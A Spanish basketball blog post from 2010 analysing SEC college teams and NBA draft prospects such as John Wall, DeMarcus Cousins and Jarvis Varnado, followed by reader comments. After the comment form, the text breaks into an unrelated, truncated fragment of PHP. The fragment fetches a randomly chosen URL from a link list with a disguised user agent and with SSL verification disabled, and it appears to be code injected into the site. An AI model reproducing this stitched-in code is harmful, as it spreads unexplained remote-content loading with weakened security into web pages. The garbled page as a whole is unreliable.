Análisis NCAA –Southeastern Conference (SEC)

08 de March de 2010 por kantonyo

Doce universidades del sureste de Estados Unidos constituyen la Conferencia SEC.

La Universidad de Kentucky es actualmente el equipo de moda en la NCAA. Después de un año para olvidar, donde no consiguieron clasificarse para el torneo final, los Wildcats han conseguido reclutar a las mejores promesas del High School: John Wall, DeMarcus Cousins, Eric Bledsoe y Daniel Orton. Este logro y los problemas legales surgidos por las irregularidades en el acceso a la universidad de Derrick Rose, acabaron de convencer a John Calipari, entrenador de los Tigers de Memphis, a coger las riendas del equipo. La temporada no ha podido ser mejor hasta el momento, con un balance de 28 victorias y sólo 2 derrotas, los de Lexington se han convertido en campeones de la Regular Season de la conferencia SEC. John Wall, base de 19 años, es el principal candidato a ser el número 1 del próximo draft. La nueva perla de North Carolina destaca por su velocidad, control del balón y su espectacular salto, recursos que le convierten en un arma letal al contragolpe y le permiten ser uno de los mejores penetradores a canasta de los últimos años. Ha demostrado ser un buen jugador de equipo, con seis asistencias de media por partido y a pesar de su fama no destaca por ser egoísta en el aspecto ofensivo. Su punto débil es el lanzamiento de media y larga distancia.

La otra gran promesa de los Wildcats es el ala-pívot de primer año DeMarcus Cousins. A pesar de estar a la sombra de John Wall, DeMarcus aspira a ser elegido en el top 10 del draft. Viéndole en acción da la sensación de que con el tiempo va a ganar peso, posiblemente sea el motivo por el cual se le compara con Al Jefferson. En este momento promedia 15 puntos y 10 rebotes. La pareja de Cousins en el juego interior, es Patrick Patterson, jugador referencia en el equipo en los últimos dos años y también candidato a los puestos altos del draft. Los otros dos jugadores de primer año, Eric Bledsoe (PG) y Daniel Orton (C) posiblemente esperen un año más para dar el salto a la NBA. Ambos serán jugadores a seguir en la temporada 2010-2011.

Los Commodores de la Universidad de Vanderbilt no han puesto las cosas nada fácil a los Wildcats gracias a su mejor temporada de los últimos quince años. Contra todo pronóstico se han situado en el puesto 19 del Ranking AP. Disponen de una plantilla muy compensada. En el juego interior cuentan con el pívot australiano de tercer año, AJ Ogilvy, y el joven alero, Jeff Taylor. A pesar de su buen caché, se rumorea que Jeff esperará un año más para dar el salto al profesionalismo. Jermaine Beal, máximo anotador del equipo con 14 puntos y el escolta de primer año John Jenkins son la referencia en el perímetro. A pesar de su buena temporada, es difícil confiar en que Vanderbilt llegue demasiado lejos en el March Madness.

Los Volunteers de Tennessee se han convertido en el “matagigantes” de la competición. A mediados de enero, consiguieron derrotar a la imbatida Universidad de Kansas y hace unos días hicieron lo mismo contra Kentucky. En los dos partidos destacó el escolta Scotty Hopson, que después de una temporada como freshman donde decepcionó, se ha convertido en referencia del equipo después de que la NCAA expulsara a Tyler Smith de la competición por un problema relacionado con las armas. En el poste alto predomina el potente ala-pívot Wayne Chism. A pesar de que esas victorias les han catapultado al puesto 16 del ranking, los Volunteers están teniendo una temporada muy irregular.

Jarvis Varnado, el mejor taponador de la historia de la NCAA, promediando cinco tapones por partido, es el jugador más destacado de los Bulldogs. Mississippi State está teniendo una temporada decepcionante después de estar a principios de año en el grupo de grandes favoritos para alzarse con el título de la NCAA. La posibilidad de juntar a Varnado con Renardo Sidney, uno de los mejores forwards llegados del High School, se esfumó debido a que la NCAA paralizó su salto a la liga universitaria. No se descarta que Sidney se presente en el próximo draft sin haber jugado un solo partido con los Bulldogs.

Quinteto Ideal

C – Jarvis Varnado (Miss St)
PF – DeMarcus Cousins (Kentucky)
SF – Patrick Patterson (Kentucky)
SG – Scotty Hopson (Tennessee)
PG – John Wall (Kentucky)

Otros jugadores a seguir

– Centers: Aj Ogilvy (Vanderbilt)
– Forwards: Wayne Chism (Tennessee), Chandler Parsons (Florida), Jeff Taylor (Vanderbilt), Murphy Holloway (Miss), Marshawn Powell (Arkansas), JaMychal Green (Alabama),Trey Thompkins (Georgia)
– Guards: Eric Bledsoe (Kentucky), Jermaine Beal (Vanderbilt), John Jenkins (Vanderbilt), Dee Bost (Miss St), Ravern Johnson (Miss St), Kenny Boynton (Florida), Chris Warren (Miss), Terrico White (Miss), Courtney Fortson (Arkansas), Devan Downey (Sout Carolina)

Torneo SEC – Playoffs

Del 11 al 14 de Marzo en Nashville, Tennessee

Comenta

10 comentarios a esta entrada

  1. Txusma dice:
    #1

    Conferencia con dos de los más mediáticos y ningún comentario? Si a Wall lo comparan con un Derrick Rose aún mejor y a Cousins con Al Jefferson, Kentucky suena para el título de la NCAA?

      Citar

  2. telekoman dice:
    #2

    Pues a mi me quedan dudas. He estado viendo unos cuantos partidos de Kentuky este febrero y he visto lo siguiente:
    John Wall es muy bueno, pero no le vendría nada mal quedarse otro añito en la universidad. Tiene visión de juego, eso es innegable, pero por lo que yo le he visto le falta algo que no se identificar exactamente (aparte de tiro). Sus decisiones no son malas, pero podrían ser mejores. Aparte de eso, en las cadenas americanas en ningún momento te dicen que vaya a dar el salto este año. Sólo te dicen que es muy bueno y que es de primer año. ¿Es posible que algún equipo se lo esté jugando al premio John Wall y al final del año el trofeo cambie de nombre?
    DeMarcus Cousins es una bestia parda, pero está verde, verde, verde. Como de el salto este año, va a tener problemas de faltas día sí, día también. Los pivots actuales, incluso los de Tampoco le vendría nada mal otro año en la uni.
    Por el contrario Patterson está bastante más hecho, aunque evidentemente no tiene tanto potencial como Cousins.

    A Varnado sólo le he visto un partido, precisamente contra Kentuky y tuvo muchos problemas para contener a Cousins. Defensivamente es la caña, pero ofensivamente…..

    Está claro que cualquier cosa que no sea llegar a la Final Four será un fracaso para Kentucky. Ganar ya es harina de otro costal.

      Citar

  3. sergio dice:
    #3

    Al menos a John… el rookie-wall no deberia afectarle como a Jennings

    Y si, era un chiste ¬¬

      Citar

  4. kantonyo dice:
    #4

    El problema para ver el potencial de Kentucky es que la Conferencia SEC, a priori es más debil que la BigEast, BigTen o Big12. Además de que hay mucho equipo de nivel bajo en la conferencia, el balance final de season 29-2 es un poco engañoso, ya que no han jugado contra equipos altos en el ranking. Contra equipos hasta el puesto 50 RPI, tienen un balance 4-1, y Kansas por ejemplo 11-2. Creo que es un poco peligroso teniendo en cuenta que son la mayoria jugadore de primer año. Será una buena prueba de fuego para saber la personalidad de Wall y Cousins

    Es díficil creer que John Wall no se va a presentar este año al draft, teniendo casi en el bote el primer puesto, y lo que eso conlleva en dinero, fama y repercusión para los próximos años. Nadie sabe si va a surgir un jugador que le haga sombra el año que viene. Eso sí, si Wall y Cousins no dan el salto, el año que viene Kentucky sería intratable en la NCAA.

    Varnardo ofensivamente no aporta gran cosa pero puede ser util para alguna franquicia de la NBA al estilo Ben Wallace.

      Citar

  5. sayim dice:
    #5

    Yo solo vi un dia a Varnardo pero me recuerda un poco a Thabeet, realmente tiene mas fundamentos? tendra problemas de faltas?

      Citar

  6. kantonyo dice:
    #6

    Antes he puesto Varnardo en vez de Varnado, no sé pq me ha dado por llamarlo así… será por la rima!!!

      Citar

  7. telekoman dice:
    #7

    Jajaja, el inconsciente te ha fallado. Problemas de faltas va a tener seguro. En el partido que os digo que le vi contra Cousins se pasó mucho tiempo en el banco por faltas. Cualquier pivot normalito le sacaría bastantes.

      Citar

  8. sergio dice:
    #8

    Ya os digo que entiendo poco de la NCAA pero veo que en esta conferencia no hay grandes pivots a seguir… casi como en la tónica de los últimos años, exceptuando la generación de Love, Lopez y Gasol.

    Si no recuerdo mal, los ultimos años de Kentucky en la NCAA han sido bastante buenos, con un par de titulos incluidos en los 90. Siempre me ha parecido curioso ver que una gran parte de ciudades y estados con tradición en la formación de jugadores en su etapa universitaria no tienen equipo en la máxima competición (bueno, los Kentucky Coronels existieron hace tiempo…) como Connecticut, Kansas, Las Vegas,…

      Citar

  9. sergio dice:
    #9

    Por cierto, ya que siempre hablamos de la hegemonia de los Celtics en los 60, no estaria mal que saliera un artículo sobre la Universidad de UCLA y sus 10 títulos en 12 años. Siempre he oido hablar de ello pero nunca he leido nada en condiciones… a ver si me cuentas algo Kantonyo. El guante esta lanzado vaya…

      Citar

  10. Dantley2 dice:
    #10

    Wall y COusins en el mismo equipo es mucha tela. A ver si la inexperiencia les juega una mala pasada.

    A Varnado le vengo siguiendo algún tiempo por razones que algunos colegas del blog pueden imaginar, estoy expectante a ver cómo traslada sus virtudes y cómo le penalizan las muchas lagunas. McGee es un taponador, DeAndre Jordan también, pero Varnado es más puro que ambos aunque ni aporta el ataque que se le supone a McGee ni la movilidad de Jordan. Además con menos cuerpo, aunque eso parece que le da igual. En alguna web le dan parecido a Ratliff, pues no se han comido mucho la cabeza, pero no sé. Creo que al final habrá equipos que busquen rebote e intimidación y llegue a final de primera ronda

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>